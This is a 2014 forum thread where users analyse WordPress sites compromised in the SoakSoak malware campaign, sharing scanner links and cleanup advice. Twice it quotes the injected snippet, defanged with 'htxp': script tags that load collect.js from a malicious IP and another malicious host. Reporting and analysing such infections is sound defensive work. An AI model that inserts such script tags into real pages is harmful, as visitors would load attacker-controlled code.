polonus
December 21, 2014, 7:31pm
1
See: http://killmalware.com/parix.de/
100/100% malicious: http://zulu.zscaler.com/submission/show/aa04ca39627a89ca655ed8f76212a8a0-1419189704
Offending IP from script on site: http://www.liveipmap.com/122.155.168.105
See: http://www.abuseipdb.com/check/122.155.168.105
The problem → https://wordpress.org/support/topic/mwspamseo-spam-problem
VT does not flag site as such. Detected: http://sitecheck.sucuri.net/results/www.parix.de
Outdated Web Server Apache Found: Apache/2.2.22; 2 malicious files: http://quttera.com/detailed_report/www.parix.de
[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]
pol
Pondus
December 21, 2014, 7:45pm
2
polonus
December 21, 2014, 8:28pm
3
Hi Pondus,
Funny that VT does not alert anything on that massive SoakSoak attack via the contributing engines, while Sucuri flags it,
but most users (those with Google Chrome and Firefox) were protected by Google Safe Browsing: goog-malware-shavar blacklist alert.
More on this malware campaign: http://gizmodo.com/mysterious-russian-malware-is-infecting-over-100-000-wo-1671419522
and for cleansing the website: https://wordpress.org/plugins/gotmls/ made by Eli.
Revslider was vulnerable as an automatic update was missed.
polonus
polonus
December 21, 2014, 10:29pm
4
Another victim, see: http://killmalware.com/hakukettu.net/
Here VT detects: https://www.virustotal.com/nb/url/ec56b3155ff8ba6a14fb14c00cb5446529758ea720a9723ca115814d658cecf3/analysis/1419200305/
38 files detected (a.o. wp-content/uploads/2013/04/karimalogo.jpg)
and the now-known malware:
[<script type="text/javascript" src="htxp://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="htxp://www.clickevents.com.my/scripts/collect.js"></script>]
→ WordPress internal path: /home4/macaman/public_html/hakukettu.net/wp-content/themes/kickstart/index.php
WordPress version 3.8 for: htxp://hakukettu.net/wp-includes/js/wp-ajax-response.js
iFrame injected malware: http://labs.sucuri.net/db/malware/mwjs-iframe-injected530?v26
polonus
polonus
December 22, 2014, 12:01am
5
Here we get a right IDS alert: http://urlquery.net/report.php?id=1418927815329 for
"ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers"
The detection is mainly from Google Safe Browsing: http://t.websitecheck.us/www/hakukettu.net
pol
Pondus
December 22, 2014, 6:47am
6
Your first post…
https://www.virustotal.com/en/file/707821fa3e3b5775a1bd462df6ec52aecc5b23a83a4903cc0137833aa89bb96a/analysis/1419264760/
Norman/BlueCoat
Detection has been added on the malicious iframe code in the HTML file parix.de.htm: Iframe.ABV
Pondus
December 22, 2014, 4:05pm
7